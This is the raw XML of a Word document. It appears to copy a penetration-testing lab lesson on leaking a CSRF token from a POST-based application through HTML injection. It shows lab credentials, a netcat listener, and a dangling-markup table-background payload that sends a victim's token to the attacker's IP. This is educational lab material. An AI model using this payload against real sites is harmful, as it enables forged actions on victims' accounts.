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D79D" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="008722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  <w:t>Cross-Site Request Forgery (POST-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C99978" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="008722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6633AE92">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F117F1D" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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The vast majority of applications nowadays perform actions through POST requests. Subsequently, CSRF tokens will reside in POST data. Let us attack such an application and try to find a way to leak the CSRF token so that we can mount a CSRF attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D465260" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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Proceed to the end of this section and click on </w:t>
      </w:r>
      <w:r w:rsidRPr="008722A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Click here to spawn the target system!</w:t>
      </w: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or the </w:t>
      </w:r>
      <w:r w:rsidRPr="008722A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Reset Target</w:t>
      </w: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icon. Use the provided Pwnbox or a local VM with the supplied VPN key to reach the target application and follow along. Don't forget to configure the specified vhost (</w:t>
      </w:r>
      <w:r w:rsidRPr="008722A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csrf.htb.net</w:t>
      </w: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) to access the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD31AB9" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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Navigate to </w:t>
      </w:r>
      <w:r w:rsidRPr="008722A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http://csrf.htb.net</w:t>
      </w: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and log in to the application using the credentials below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B4E99F" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="00872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Email: heavycat106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25735E5E" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="00872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Password: rocknrol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F7FB50" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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This is an account that we created to look at the application's functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25710AA0" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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After authenticating as a user, you'll notice that you can delete your account. Let us see how one could steal the user's CSRF-Token by exploiting an HTML Injection/XSS Vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB15870" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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Click on the "Delete" button. You will get redirected to </w:t>
      </w:r>
      <w:r w:rsidRPr="008722A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/app/delete/&lt;your-email&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9AC95B" w14:textId="40D1F56E" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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67BD00C3" wp14:editId="54CC6881">
            <wp:extent cx="5731510" cy="3285490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="114633743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B8DE2" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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Notice that the email is reflected on the page. Let us try inputting some HTML into the </w:t>
      </w:r>
      <w:r w:rsidRPr="008722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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>email</w:t>
      </w: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value, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EF1189" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="008722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html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028086F8" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="00872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722A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lastRenderedPageBreak/>
        <w:t>&lt;h1&gt;h1&lt;u&gt;underline&lt;%2fu&gt;&lt;%2fh1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C6958A" w14:textId="2C30F943" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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58D31DFE" wp14:editId="24D22061">
            <wp:extent cx="5731510" cy="3259455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1810788825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8084" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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If you inspect the source (</w:t>
      </w:r>
      <w:r w:rsidRPr="008722A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Ctrl+U</w:t>
      </w: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), you will notice that our injection happens before a </w:t>
      </w:r>
      <w:r w:rsidRPr="008722A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single quote</w:t>
      </w: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 We can abuse this to leak the CSRF-Token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4606F7" w14:textId="319289DE" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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36327B5B" wp14:editId="51C14B43">
            <wp:extent cx="5731510" cy="2482850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1896682983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28B8" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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Let us first instruct Netcat to listen on port 8000, as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D4DF68" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="00872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722A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yovecio@htb[/htb]$ nc -nlvp 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8B53FA" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="00872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722A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listening on [any] 8000 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F216455" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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Now we can get the CSRF token via sending the below payload to our victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F12C170" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="008722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html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D938DC6" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="00872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722A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&lt;table%20background='%2f%2f&lt;VPN/TUN Adapter IP&gt;:PORT%2f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2C597" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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lastRenderedPageBreak/>
        <w:t xml:space="preserve">While still logged in as Julie Rogers, open a new tab and visit </w:t>
      </w:r>
      <w:r w:rsidRPr="008722A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http://csrf.htb.net/app/delete/%3Ctable background='%2f%2f&lt;VPN/TUN Adapter IP&gt;:8000%2f</w:t>
      </w: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 You will notice a connection being made that leaks the CSRF token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552F178" w14:textId="4F0EBCFC" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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49B322FB" wp14:editId="269C239B">
            <wp:extent cx="5731510" cy="2762885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="375055695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6A9A" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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Since the attack was successful against our test account, we can do the same against any account of our choosing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23346B5E" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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We remind you that this attack does not require the attacker to reside in the local network. HTML Injection is used to leak the victim's CSRF token remotely!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07AB53" w14:textId="77777777" w:rsidR="008722A2" w:rsidRPr="008722A2" w:rsidRDefault="008722A2" w:rsidP="0087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8722A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Next, we will cover how you can chain XSS and CSRF to attack a user's session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC52A57" w14:textId="77777777" w:rsidR="00213442" w:rsidRDefault="00213442"/>
    <w:sectPr w:rsidR="0021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C25AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6FC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18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71"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="008722A2"/>
    <w:rsid w:val="00F5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83FE6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9C785584-F058-4F16-9A32-945F1577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22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2A2"/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22A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22A2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008722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2A2"/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token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008722A2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0087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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-27T09:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-27T09:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>